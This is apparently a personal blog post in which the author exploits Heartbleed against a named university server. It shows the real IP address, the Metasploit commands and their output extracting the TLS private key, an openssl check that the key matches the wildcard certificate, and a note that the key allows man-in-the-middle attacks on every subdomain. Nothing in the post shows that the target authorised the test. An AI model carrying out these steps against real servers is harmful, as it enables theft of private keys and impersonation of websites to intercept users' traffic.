In this post I will explain how I managed to download the private key of an SSL certificate, essentially allowing me to install a valid copy of it on a personal server, and impersonate any website the original web server is hosting without triggering any validation errors.

Server discovery

Using censys.io I found that the server located at 190.104.250.126, under the domain of ITBA, was vulnerable to Heartbleed because of an outdated OpenSSL installation. To test this, I used the Metasploit Framework, targeted at said IP address.

msf auxiliary(openssl_heartbleed) > set rhosts 190.104.250.126
rhosts => 190.104.250.126
msf auxiliary(openssl_heartbleed) > set action SCAN
action => SCAN
msf auxiliary(openssl_heartbleed) > run
[+] 190.104.250.126:443   - Heartbeat response with leak
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

After confirming that the server was indeed vulnerable, we can now configure Metasploit to fire multiple requests at the server, hoping to find a private key in the memory dumps received. After a few requests, we get the private key of the certificate being used to provide HTTPS access to the web server.

msf auxiliary(openssl_heartbleed) > set action KEYS
action => KEYS
msf auxiliary(openssl_heartbleed) > run
[+] 190.104.250.126:443   - Found factor at offset ef97
[+] 190.104.250.126:443   - 2016-07-24 15:13:09 UTC - Got the private key
[*] 190.104.250.126:443   - -----BEGIN RSA PRIVATE KEY-----
MIIEpQIBAAKCAQEArHLRNX1uaJiA0pmB76BD+IMJogDBoN7iWN5IBkfBV0y/DzSZ
...
-----END RSA PRIVATE KEY-----

Private key verification

To verify the private key, we must first download the certificate of the vulnerable server:

openssl s_client -showcerts -connect sakai.itba.edu.ar:443
CONNECTED(00000003)
depth=3 /C=US/O=The Go Daddy Group, Inc./OU=Go Daddy Class 2 Certification Authority
verify error:num=19:self signed certificate in certificate chain
verify return:0
---
Certificate chain
 0 s:/OU=Domain Control Validated/CN=*.itba.edu.ar
   i:/C=US/ST=Arizona/L=Scottsdale/O=GoDaddy.com, Inc./OU=http://certs.godaddy.com/repository//CN=Go Daddy Secure Certificate Authority - G2
-----BEGIN CERTIFICATE-----
MIIFIzCCBAugAwIBAgIJAMokMWzdhblgMA0GCSqGSIb3DQEBCwUAMIG0MQswCQYD
...
-----END CERTIFICATE-----

Because the modulus of the keys are too long to compare by eye, we can calculate the MD5 hash of both of them, which is much easier to compare by just looking at it:

$ openssl x509 -noout -modulus -in public.crt | openssl md5
159f5ef1d35895db06ac586e1c15447d

$ openssl rsa -noout -modulus -in private.key | openssl md5
159f5ef1d35895db06ac586e1c15447d

As you can see, both keys, the public and private pair, share the same modulus. This must mean that the private key corresponds to the downloaded public pair.

Notes

Being a wildcard certificate for *.itba.edu.ar, we can execute a MITM attack at any subdomain without triggering any validation error, not only to the one used to obtain the certificate.

Update (20/9/2016)

As the exposed certificate has already been revoked and replaced, I am making it available for everyone to download. Click here to downlaod itba.fullchain.crt.tar.gz

Next Post